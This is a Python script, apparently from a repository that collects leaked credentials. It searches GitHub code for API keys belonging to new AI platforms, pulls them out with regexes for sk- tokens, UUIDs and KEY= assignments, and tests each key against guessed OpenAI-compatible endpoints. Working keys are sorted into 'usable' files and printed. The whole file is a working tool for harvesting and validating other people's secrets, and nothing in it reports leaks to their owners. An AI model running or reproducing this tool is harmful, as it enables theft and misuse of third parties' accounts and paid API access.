Local branch had diverged from origin/master (sibling commits on the same base). Rewrote local history linearly on top of origin/master, folding in all local content: exa/hot-platform discovery hunters, leaks ledger, nightly sweep orchestrator, updated .gitignore and skill docs, plus the latest hunt output and vault state. Remote-only files (vault keys, channel scripts) were restored rather than dropped, so the resulting tree is a full union of both sides.
273 lines
10 KiB
Python
273 lines
10 KiB
Python
#!/usr/bin/env python3
|
|
"""Hunt API keys for hot/new platforms from hot_platforms.json.
|
|
|
|
For each ENABLED platform:
|
|
1. GitHub code search: env-var names (NAME_API_KEY, NAME_KEY, ...) and
|
|
the endpoint phrase ("api.<name>.ai" etc).
|
|
2. Extract: env assignments + generic secret shapes near those signals.
|
|
3. Verify:
|
|
- explicit "verify" config in the registry when present;
|
|
- otherwise probe OpenAI-compatible endpoints in order:
|
|
https://api.<name>.ai|com|io/v1/models and <name>.ai|com/api/v1/models
|
|
with `Authorization: Bearer <key>`:
|
|
200 -> USABLE (base_url recorded)
|
|
401 on any -> endpoint exists, key invalid (DEAD if all 401)
|
|
404/403 -> try next endpoint
|
|
all 404/net -> UNKNOWN (needs human endpoint research)
|
|
4. Every candidate file is recorded in the leaks ledger.
|
|
|
|
Output: results/hot/<platform>/{usable,no_balance,no_access,unknown,dead}.txt
|
|
"""
|
|
|
|
import argparse
|
|
import json
|
|
import os
|
|
import re
|
|
import sys
|
|
import time
|
|
import urllib.error
|
|
import urllib.parse
|
|
import urllib.request
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from pathlib import Path
|
|
|
|
sys.path.insert(0, str(Path(__file__).resolve().parent))
|
|
from hunt_ai_tools import gh_opener, direct_opener, github_token, http_get
|
|
from verify_cache import CachedVerifier
|
|
|
|
HERE = Path(__file__).resolve().parent
|
|
CONF = HERE / "hot_platforms.json"
|
|
RESULTS = HERE / "results" / "hot"
|
|
RESULTS.mkdir(parents=True, exist_ok=True)
|
|
|
|
UA = "curl/8.5.0"
|
|
|
|
UUID_RE = re.compile(
|
|
r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}")
|
|
HEX32_RE = re.compile(r"\b[a-fA-F0-9]{32}\b")
|
|
SK_RE = re.compile(r"\bsk-[A-Za-z0-9_\-]{16,120}\b")
|
|
ENV_ASSIGN_RE = re.compile(
|
|
r"\b([A-Za-z0-9_]*(?:API_KEY|APIKEY|KEY|TOKEN))\s*[:=]\s*[\"']?"
|
|
r"([A-Za-z0-9_\-\.]{12,160})")
|
|
|
|
|
|
def load_platforms():
|
|
try:
|
|
return json.loads(CONF.read_text()).get("platforms", [])
|
|
except Exception:
|
|
return []
|
|
|
|
|
|
def search(query, token, pages=2):
|
|
files = {}
|
|
for page in range(1, pages + 1):
|
|
url = ("https://api.github.com/search/code?"
|
|
f"q={urllib.parse.quote(query)}&per_page=100&page={page}")
|
|
code, body, hdrs = http_get(url, token=token)
|
|
if code == 200:
|
|
try:
|
|
items = json.loads(body).get("items", [])
|
|
except Exception:
|
|
items = []
|
|
for it in items:
|
|
files[it["html_url"]] = it
|
|
if len(items) < 100:
|
|
break
|
|
time.sleep(2.0)
|
|
elif code in (403, 429):
|
|
reset = hdrs.get("X-RateLimit-Reset")
|
|
wait = max(int(reset) - int(time.time()), 5) if reset else 30
|
|
print(f" rate-limited {wait}s", file=sys.stderr, flush=True)
|
|
time.sleep(wait + 1)
|
|
else:
|
|
break
|
|
return files
|
|
|
|
|
|
def extract(text, env_vars):
|
|
"""Yield (key, detail) from file text near platform env/endpoint signals."""
|
|
low = text.lower()
|
|
out, seen = [], set()
|
|
|
|
def emit(k, d):
|
|
if k in seen or len(k) < 12:
|
|
return
|
|
if any(f in k.lower() for f in ("xxxx", "example", "your-", "placeholder",
|
|
"changeme", "replace")):
|
|
return
|
|
seen.add(k)
|
|
out.append((k, d))
|
|
|
|
# explicit env var assignment (strongest)
|
|
for v in env_vars:
|
|
pat = re.compile(
|
|
re.escape(v) + r"\s*[:=]\s*[\"']?([A-Za-z0-9_\-\.]{12,160})")
|
|
for m in pat.finditer(text):
|
|
emit(m.group(1), f"env:{v}")
|
|
|
|
# generic KEY= assignment if the file already mentions the platform
|
|
for m in ENV_ASSIGN_RE.finditer(text):
|
|
if any(seg in low for seg in ("api." + m.group(1).lower(),
|
|
m.group(1).lower() + ".ai")):
|
|
emit(m.group(2), f"env:{m.group(1)}")
|
|
|
|
# generic secret shapes if file mentions the platform name at all
|
|
if any(v.lower() in low for v in env_vars) or "api." in low:
|
|
for m in UUID_RE.finditer(text):
|
|
emit(m.group(0), "uuid")
|
|
for m in SK_RE.finditer(text):
|
|
emit(m.group(0), "sk-")
|
|
return out
|
|
|
|
|
|
def probe_endpoints(name, key, timeout=15):
|
|
"""Try OpenAI-compatible endpoints. Returns (verdict, detail)."""
|
|
cands = [f"https://api.{name}.ai/v1/models",
|
|
f"https://api.{name}.com/v1/models",
|
|
f"https://api.{name}.io/v1/models",
|
|
f"https://{name}.ai/api/v1/models",
|
|
f"https://{name}.com/api/v1/models"]
|
|
saw_401 = False
|
|
for url in cands:
|
|
req = urllib.request.Request(url, method="GET",
|
|
headers={"User-Agent": UA, "Accept": "*/*",
|
|
"Authorization": f"Bearer {key}"})
|
|
try:
|
|
with direct_opener().open(req, timeout=timeout) as r:
|
|
body = r.read().decode("utf-8", "replace")
|
|
if '"models"' in body or r.getcode() == 200:
|
|
return "USABLE", f"{url} 200 {body[:80]}"
|
|
return "USABLE", f"{url} 200 {body[:80]}"
|
|
except urllib.error.HTTPError as e:
|
|
if e.code == 401:
|
|
saw_401 = True
|
|
elif e.code in (403, 429):
|
|
return "NO_ACCESS", f"{url} {e.code}"
|
|
# 404 -> next endpoint
|
|
except Exception:
|
|
pass
|
|
if saw_401:
|
|
return "DEAD", "all endpoints 401 (key invalid)"
|
|
return "UNKNOWN", "no endpoint responded (404/net)"
|
|
|
|
|
|
def verify_platform(plat, key):
|
|
v = plat.get("verify")
|
|
if v:
|
|
url = v["url"]
|
|
headers = {k: (val.replace("{key}", key) if isinstance(val, str) else val)
|
|
for k, val in v.get("headers", {}).items()}
|
|
body = v.get("body")
|
|
data = json.dumps(body).encode() if body else None
|
|
req = urllib.request.Request(url, data=data, method=v.get("method", "GET"),
|
|
headers={"User-Agent": UA, **headers})
|
|
try:
|
|
with direct_opener().open(req, timeout=20) as r:
|
|
b = r.read().decode("utf-8", "replace")
|
|
return "USABLE", f"{url} 200 {b[:80]}"
|
|
except urllib.error.HTTPError as e:
|
|
if e.code == 401:
|
|
return "DEAD", f"{url} 401"
|
|
if e.code in (402, 429):
|
|
return "NO_BALANCE", f"{url} {e.code}"
|
|
return "NO_ACCESS", f"{url} {e.code}"
|
|
except Exception as e:
|
|
return "UNKNOWN", f"net:{e}"
|
|
return probe_endpoints(plat["name"], key)
|
|
|
|
|
|
def fetch_raw(url, timeout=20):
|
|
raw = (url.replace("github.com", "raw.githubusercontent.com")
|
|
.replace("/blob/", "/"))
|
|
req = urllib.request.Request(raw, headers={"User-Agent": UA})
|
|
try:
|
|
with gh_opener().open(req, timeout=timeout) as r:
|
|
return r.read().decode("utf-8", "replace")
|
|
except Exception:
|
|
return None
|
|
|
|
|
|
def main():
|
|
ap = argparse.ArgumentParser()
|
|
ap.add_argument("--only", default=None, help="only hunt this platform")
|
|
ap.add_argument("--workers", type=int, default=6)
|
|
ap.add_argument("--pages", type=int, default=2)
|
|
args = ap.parse_args()
|
|
|
|
plats = load_platforms()
|
|
if args.only:
|
|
plats = [p for p in plats if p["name"] == args.only]
|
|
plats = [p for p in plats if p.get("enabled")]
|
|
if not plats:
|
|
print("no enabled platforms in hot_platforms.json "
|
|
"(run hot_platforms.py to discover, then enable).")
|
|
return
|
|
|
|
token = github_token()
|
|
print(f"hunting {len(plats)} hot platforms (token={'yes' if token else 'no'})",
|
|
flush=True)
|
|
|
|
for plat in plats:
|
|
name = plat["name"]
|
|
print(f"\n== {name} ==", flush=True)
|
|
queries = list(plat.get("env_vars", []))[:3]
|
|
if plat.get("endpoint"):
|
|
queries.append(f'"{plat["endpoint"]}"')
|
|
queries.append(f'"api.{name}"')
|
|
|
|
files = {}
|
|
for q in queries:
|
|
files.update(search(q, token, args.pages))
|
|
print(f" {len(files)} candidate files", flush=True)
|
|
|
|
outdir = RESULTS / name
|
|
outdir.mkdir(parents=True, exist_ok=True)
|
|
|
|
cands = {}
|
|
with ThreadPoolExecutor(max_workers=10) as pool:
|
|
futs = {pool.submit(fetch_raw, u): u for u in files}
|
|
for fut in as_completed(futs):
|
|
u = futs[fut]
|
|
try:
|
|
text = fut.result()
|
|
except Exception:
|
|
text = None
|
|
if not text:
|
|
continue
|
|
for k, d in extract(text, plat.get("env_vars", [])):
|
|
cands.setdefault(k, {"url": u, "detail": d})
|
|
|
|
with (outdir / "extracted_keys.txt").open("w") as f:
|
|
for k, m in cands.items():
|
|
f.write(f"{k}|{m['url']}|{m['detail']}\n")
|
|
print(f" {len(cands)} candidates", flush=True)
|
|
if not cands:
|
|
continue
|
|
|
|
buckets = {"USABLE": [], "NO_BALANCE": [], "NO_ACCESS": [],
|
|
"UNKNOWN": [], "DEAD": []}
|
|
with CachedVerifier(f"hot_{name}", lambda k: verify_platform(plat, k)) as ver:
|
|
with ThreadPoolExecutor(max_workers=args.workers) as pool:
|
|
futs = {pool.submit(ver, k): k for k in cands}
|
|
for fut in as_completed(futs):
|
|
k = futs[fut]
|
|
try:
|
|
v, d = fut.result()
|
|
except Exception as e:
|
|
v, d = "UNKNOWN", f"exc:{e}"
|
|
buckets[v].append((k, cands[k], d))
|
|
|
|
for label, fn in (("USABLE", "usable.txt"), ("NO_BALANCE", "no_balance.txt"),
|
|
("NO_ACCESS", "no_access.txt"), ("UNKNOWN", "unknown.txt"),
|
|
("DEAD", "dead.txt")):
|
|
with (outdir / fn).open("w") as f:
|
|
for k, m, d in buckets[label]:
|
|
f.write(f"{k}|{m['url']}|{d}\n")
|
|
print(" " + " ".join(f"{k}={len(v)}" for k, v in buckets.items()),
|
|
flush=True)
|
|
for k, m, d in buckets["USABLE"]:
|
|
print(f" ✅ {k} {m['url']}", flush=True)
|
|
|
|
|
|
if __name__ == "__main__":
|
|
main() |